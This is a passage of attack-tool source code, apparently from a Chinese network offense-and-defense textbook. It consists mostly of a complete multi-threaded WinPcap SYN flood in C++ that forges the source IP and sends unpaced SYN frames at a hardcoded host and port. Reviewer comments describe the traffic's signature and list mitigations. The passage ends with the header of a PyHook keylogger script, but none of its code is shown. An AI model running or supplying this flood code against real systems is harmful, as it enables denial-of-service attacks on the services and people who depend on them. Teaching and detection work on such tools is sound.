
网络攻防原理与技术源代码

/*===================================================
* Multi-threaded SYN flood source code based on WinPcap
* Platforms: WinXP, Win2k3, WinVista, Win2k8, Win7
* Build environment: VC6.0 + WinPcap SDK
*====================================================*/
// Reviewer notes (what this listing puts on the wire, read for detection and mitigation):
// - Each frame is Ethernet + IPv4 + TCP with no payload. With the packed layouts
//   below that is 14 + 20 + 44 = 78 bytes (assuming 2-byte short / 4-byte int).
// - BuildSYNPacket writes the same values into every frame: IP ident 1, DF set,
//   TTL 128, TCP window 512, and one fixed 24-byte option block whose timestamp
//   value is zero. Only the TCP source port and sequence number change per frame;
//   the IP source is always FAKE_IP.
// - The Ethernet source address is the sending adapter's own MAC (GetSelfMac);
//   only the IP source is forged, so on the local segment the frames remain
//   attributable to a MAC / switch port.
// - Usual countermeasures for this traffic class: SYN cookies or a SYN proxy in
//   front of the listener, source-address validation (ingress filtering / uRPF)
//   at the access layer, and SYN rate limits per destination port.
#define WIN32_LEAN_AND_MEAN
#define _WSPIAPI_COUNTOF
#include <windows.h>
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <packet32.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "packet.lib")
#define MAXTHREAD 20 // number of sender threads created per pass in main()
#define OID_802_3_CURRENT_ADDRESS 0x01010102 // OID passed to PacketRequest to read the adapter MAC
#define OPTION_LENTH 6 // TCP option area, counted in 32-bit words
#define SYN_DEST_IP "192.168.0.22" // destination IP of the generated SYNs
#define SYN_DEST_PORT 80 // destination port of the generated SYNs
#define FAKE_IP "192.168.0.11" // forged source IP
// Labelled "spoofed MAC" in the original; main() copies it into the frame's
// destination MAC field (param.dstmac), not the source.
#define FAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6"
// Structure packing must be 1 so the structs match the wire layout byte for byte.
#pragma pack(1)
typedef struct et_header // Ethernet header
{
    unsigned char eh_dst[6]; // destination MAC
    unsigned char eh_src[6]; // source MAC
    unsigned short eh_type; // EtherType of the encapsulated protocol
}ET_HEADER;
typedef struct ip_hdr // IPv4 header (no options)
{
    unsigned char h_verlen; // version (high nibble) and header length in 32-bit words
    unsigned char tos; // type of service
    unsigned short total_len; // total length
    unsigned short ident; // identification
    unsigned short frag_and_flags; // 3 flag bits and 13-bit fragment offset
    unsigned char ttl; // time to live
    unsigned char proto; // protocol
    unsigned short checksum; // header checksum
    unsigned int sourceIP; // source IP
    unsigned int destIP; // destination IP
}IP_HEADER;
typedef struct tcp_hdr // TCP header followed by a fixed option area
{
    unsigned short th_sport; // 16-bit source port
    unsigned short th_dport; // 16-bit destination port
    unsigned int th_seq; // 32-bit sequence number
    unsigned int th_ack; // 32-bit acknowledgement number
    unsigned short th_data_flag; // 16 bits: data offset, reserved bits and flags
    unsigned short th_win; // 16-bit window size
    unsigned short th_sum; // 16-bit checksum
    unsigned short th_urp; // 16-bit urgent pointer
    unsigned int option[OPTION_LENTH]; // option bytes, filled in BuildSYNPacket
}TCP_HEADER;
typedef struct psd_hdr // TCP pseudo-header, used only for the checksum
{
    unsigned long saddr; // source address
    unsigned long daddr; // destination address
    char mbz; // set to 0 by BuildSYNPacket
    char ptcl; // protocol
    unsigned short tcpl; // TCP length
}PSD_HEADER;
typedef struct _SYN_PACKET // complete frame as handed to pcap_sendpacket
{
    ET_HEADER eth; // Ethernet header
    IP_HEADER iph; // IPv4 header (the original comment said "ARP", which does not match the type)
    TCP_HEADER tcph; // TCP header
}SYN_PACKET;
#pragma pack()
typedef struct _PARAMETERS // argument block passed to each sender thread
{
    unsigned int srcIP; // source IP written into the IP header
    unsigned int dstIP; // destination IP written into the IP header
    unsigned short dstPort; // destination port, host order (BuildSYNPacket applies htons)
    unsigned char* srcmac; // points at GetSelfMac's static buffer; may be NULL if GetSelfMac failed
    unsigned char dstmac[6]; // destination MAC for the Ethernet header
    pcap_t* adhandle; // open WinPcap handle shared by all threads
}PARAMETERS, *LPPARAMETERS;

// Reads the MAC address of the adapter named pDevName through the packet.dll API.
// Returns a pointer to a function-static 6-byte buffer (shared by all callers and
// overwritten on each call), or NULL when the adapter cannot be opened or the
// request buffer cannot be allocated. If PacketRequest itself fails, the buffer is
// still returned but holds all zeros.
unsigned char* GetSelfMac(char* pDevName)
{
    static u_char mac[6];
    memset(mac, 0, sizeof(mac));
    LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
    // NOTE(review): "INV ALID_HANDLE_VALUE" carries a stray space from the page
    // extraction; the Win32 constant is INVALID_HANDLE_VALUE.
    // NOTE(review): when lpAdapter is non-NULL but its hFile is invalid, this
    // returns without calling PacketCloseAdapter.
    if (!lpAdapter || (lpAdapter->hFile == INV ALID_HANDLE_VALUE))
    {
        return NULL;
    }
    // Request buffer: the PACKET_OID_DATA header plus 6 bytes for the address.
    // NOTE(review): "PPACKET_OID_DA TA" is the same extraction artifact; the type
    // is the pointer form of PACKET_OID_DATA used in the sizeof on this line.
    PPACKET_OID_DA TA OidData =(PPACKET_OID_DA TA)malloc(6 + sizeof(PACKET_OID_DATA));
    if (OidData == NULL)
    {
        PacketCloseAdapter(lpAdapter);
        return NULL;
    }
    OidData->Oid = OID_802_3_CURRENT_ADDRESS;
    OidData->Length = 6;
    memset(OidData->Data, 0, 6);
    // FALSE is the second argument of PacketRequest; presumably it selects a
    // query rather than a set operation (confirm against the WinPcap docs).
    BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
    if(Status)
    {
        memcpy(mac,(u_char*)(OidData->Data),6);
    }
    free(OidData);
    PacketCloseAdapter(lpAdapter);
    return mac;
}

// Computes the 16-bit one's-complement checksum over `size` bytes at `buffer`:
// sums 16-bit words, adds a trailing odd byte if present, folds the carries back
// into the low 16 bits and returns the complement.
unsigned short CheckSum(unsigned short * buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1)
    {
        cksum += *buffer++;
        size -= sizeof(unsigned short);
    }
    // Odd length: the last byte is added as-is (low-order position).
    if (size)
    {
        cksum += *(unsigned char *) buffer;
    }
    // Fold the carry bits twice so the result fits in 16 bits.
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (unsigned short) (~cksum);
}

// Fills `packet` with one Ethernet/IPv4/TCP SYN frame and computes both checksums.
// (The original comment called this "build ARP request packet"; the code builds a
// TCP SYN.) `packet` is a C++ reference parameter, so the listing is C++ even
// though the rest is written C-style. srcIp and destIp are stored unchanged,
// dstPort is converted with htons.
void BuildSYNPacket(SYN_PACKET &packet,unsigned char* source_mac,unsigned char* dest_mac,unsigned long srcIp,unsigned long destIp,unsigned short dstPort)
{
    PSD_HEADER PsdHeader;
    // Ethernet header
    memcpy(packet.eth.eh_dst, dest_mac, 6);
    memcpy(packet.eth.eh_src, source_mac, 6);
    packet.eth.eh_type = htons(0x0800); // 0x0800 is the IPv4 EtherType (the original comment said ARP)
    // IP header
    packet.iph.h_verlen = 0;
    // Version 4 in the high nibble, header length in 32-bit words in the low nibble.
    packet.iph.h_verlen = ((4<<4)| sizeof(IP_HEADER)/sizeof(unsigned int));
    packet.iph.tos = 0;
    packet.iph.total_len= htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
    // Constant identification, assigned without htons: on a little-endian host the
    // field reads 0x0100 in network order. Identical in every frame.
    packet.iph.ident = 1;
    packet.iph.frag_and_flags = htons(1<<14); // 0x4000: Don't Fragment set, offset 0
    packet.iph.ttl = 128;
    packet.iph.proto = IPPROTO_TCP;
    packet.iph.checksum = 0; // must be zero while the checksum is computed below
    packet.iph.sourceIP = srcIp;
    packet.iph.destIP = destIp;
    // TCP header
    // rand() % 60000 + 1024; with a RAND_MAX of 32767 (typical of the stated MSVC
    // toolchain, confirm) the source port stays within 1024..33791.
    packet.tcph.th_sport= htons(rand()%60000 + 1024);
    packet.tcph.th_dport= htons(dstPort);
    packet.tcph.th_seq = htonl(rand()%900000000 + 100000);
    packet.tcph.th_ack = 0;
    packet.tcph.th_data_flag = 0;
    // 0x02B0 stored in host order, no htons: on a little-endian host the wire
    // bytes are 0xB0 (data offset 11 words = 44 bytes) then 0x02 (SYN only).
    packet.tcph.th_data_flag = (11<<4|2<<8);
    packet.tcph.th_win = htons(512);
    packet.tcph.th_sum = 0; // must be zero while the checksum is computed below
    packet.tcph.th_urp = 0;
    // Fixed option block, identical in every frame:
    packet.tcph.option[0] = htonl(0X020405B4); // MSS (kind 2, len 4) = 1460
    packet.tcph.option[1] = htonl(0x01030303); // NOP, window scale (kind 3, len 3) shift 3
    packet.tcph.option[2] = htonl(0x0101080A); // NOP, NOP, timestamp (kind 8, len 10) ...
    packet.tcph.option[3] = htonl(0x00000000); // ... timestamp value 0
    packet.tcph.option[4] = htonl(0X00000000); // ... timestamp echo reply 0
    packet.tcph.option[5] = htonl(0X01010402); // NOP, NOP, SACK permitted (kind 4, len 2)
    // Pseudo-header for the TCP checksum
    PsdHeader.saddr = srcIp;
    PsdHeader.daddr = packet.iph.destIP;
    PsdHeader.mbz = 0;
    PsdHeader.ptcl = IPPROTO_TCP;
    PsdHeader.tcpl = htons(sizeof(TCP_HEADER));
    // Scratch buffer: pseudo-header immediately followed by the TCP header.
    BYTE Buffer[sizeof(PsdHeader)+sizeof(TCP_HEADER)] = {0};
    memcpy(Buffer, &PsdHeader, sizeof(PsdHeader));
    memcpy(Buffer + sizeof(PsdHeader), &packet.tcph, sizeof(TCP_HEADER));
    packet.tcph.th_sum = CheckSum((unsigned short *)Buffer,sizeof(PsdHeader) + sizeof(TCP_HEADER));
    // Reuse the scratch buffer for the IP header checksum.
    memset(Buffer, 0, sizeof(Buffer));
    memcpy(Buffer, &packet.iph, sizeof(IP_HEADER));
    packet.iph.checksum = CheckSum((unsigned short *)Buffer, sizeof(IP_HEADER));
    return;
}

// Sender thread entry point. Copies the PARAMETERS block pointed to by lp, then
// builds and sends one frame per loop iteration on the shared pcap handle. The
// loop has no pacing and no exit condition, so the trailing return is never
// reached; the thread ends only when the process does.
DWORD WINAPI SYNFloodThread(LPVOID lp)
{
    PARAMETERS param;
    // Private copy of the caller's struct; srcmac inside it is still a pointer
    // to the shared buffer.
    param = *((LPPARAMETERS)lp);
    Sleep(10);
    while(true)
    {
        SYN_PACKET packet;
        BuildSYNPacket(packet, param.srcmac, param.dstmac,param.srcIP, param.dstIP, param.dstPort);
        // A send failure is only logged; the loop continues.
        if (pcap_sendpacket(param.adhandle,(const unsigned char*)&packet,sizeof(packet))==-1)
        {
            fprintf(stderr, "pcap_sendpacket error.\n");
        }
    }
    return 1;
}

// Program entry point: parses the compile-time addresses, lets the user pick an
// adapter from the WinPcap device list, opens it, starts the sender threads and
// waits for 'q'/'Q' on stdin. argc and argv are not used.
int main(int argc,char* argv[])
{
    unsigned long fakeIp = inet_addr(FAKE_IP); // forged source IP
    if (fakeIp == INADDR_NONE)
    {
        fprintf(stderr,"Invalid IP: %s\n", FAKE_IP);
        return -1;
    }
    unsigned long destIp = inet_addr(SYN_DEST_IP); // destination IP
    if (destIp == INADDR_NONE)
    {
        fprintf(stderr,"Invalid IP: %s\n",SYN_DEST_IP);
        return -1;
    }
    unsigned short dstPort = SYN_DEST_PORT; // destination port
    // NOTE(review): dstPort is an unsigned short, so this range check can never
    // be true; an out-of-range constant would already have been truncated above.
    if (dstPort < 0 || dstPort > 65535)
    {
        fprintf(stderr,"InvalidPort: %d\n", SYN_DEST_PORT);
        return -1;
    }
    pcap_if_t *alldevs; // head of the adapter list
    pcap_if_t *d; // current adapter
    pcap_addr_t *pAddr; // address entry of the selected adapter
    char errbuf[PCAP_ERRBUF_SIZE]; // error message buffer
    if (pcap_findalldevs(&alldevs, errbuf) == -1) // enumerate local adapters
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }
    // Print a numbered list of adapters; i ends up as the adapter count.
    int i = 0;
    for (d = alldevs; d; d = d->next)
    {
        printf("%d", ++i);
        if (d->description)
            printf(". %s\n", d->description);
        else
            printf(". No description available\n");
    }
    if (i == 0)
    {
        fprintf(stderr, "\nNo interfaces found!\n");
        return -1;
    }
    printf("Enter the interface number (1-%d):", i);
    int inum;
    // NOTE(review): scanf's return value is not checked; on non-numeric input
    // inum is read uninitialized by the range test below.
    scanf("%d", &inum); // adapter index chosen by the user
    if(inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        pcap_freealldevs(alldevs);
        return -1;
    }
    HANDLE threadhandle[MAXTHREAD];
    PARAMETERS param;
    // Destination MAC for the Ethernet header
    memcpy(param.dstmac, FAKE_MAC, 6);
    // Fill in the thread argument block
    param.dstIP = destIp;
    param.srcIP = fakeIp;
    param.dstPort = dstPort;
    // Walk the list to the adapter the user selected (empty loop body).
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
    // NOTE(review): GetSelfMac can return NULL; the printf below dereferences
    // param.srcmac without checking.
    param.srcmac = GetSelfMac(d->name);
    printf("发送SYN包,本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s\n", param.srcmac[0],param.srcmac[1],param.srcmac[2],param.srcmac[3],param.srcmac[4],param.srcmac[5], FAKE_IP);
    // Open the adapter: snaplen 65536, promiscuous flag 0, read timeout 1000 ms.
    if ((param.adhandle= pcap_open_live(d->name, 65536, 0, 1000, errbuf)) == NULL)
    {
        fprintf(stderr,"\nUnable to open adapter.\n");
        pcap_freealldevs(alldevs);
        return -1;
    }
    pAddr = d->addresses;
    // One batch of MAXTHREAD threads is started per address entry on the adapter;
    // each batch overwrites the handles stored by the previous one.
    while (pAddr)
    {
        // Create the sender threads
        for (int i = 0; i < MAXTHREAD; i++)
        {
            // Every thread receives the address of the same stack-allocated param
            // and copies it on entry.
            threadhandle[i] =CreateThread(NULL, 0, SYNFloodThread, (void *)&param, 0, NULL);
            // NOTE(review): this tests the array itself, which is never NULL, so
            // a failed CreateThread (threadhandle[i] == NULL) is never reported.
            if(!threadhandle)
            {
                printf("CreateThread error: %d\n",GetLastError());
            }
            Sleep(100);
        }
        pAddr = pAddr->next;
    }
    printf("退出请输入q或者Q!\n");
    // Block until the user types q or Q. On this path the thread handles, the pcap
    // handle and the device list are not released before returning.
    // NOTE(review): getchar() returns int; storing it in a char hides EOF.
    char cQuit;
    do {
        cQuit = getchar();
    }while(cQuit != 'q' && cQuit != 'Q');
    return 0;
}
##############################################################################
# 程序名:keylogger.py
# 功能:利用Python第三方库PyHook实现键盘记录
# 说明:运行平台Windows。
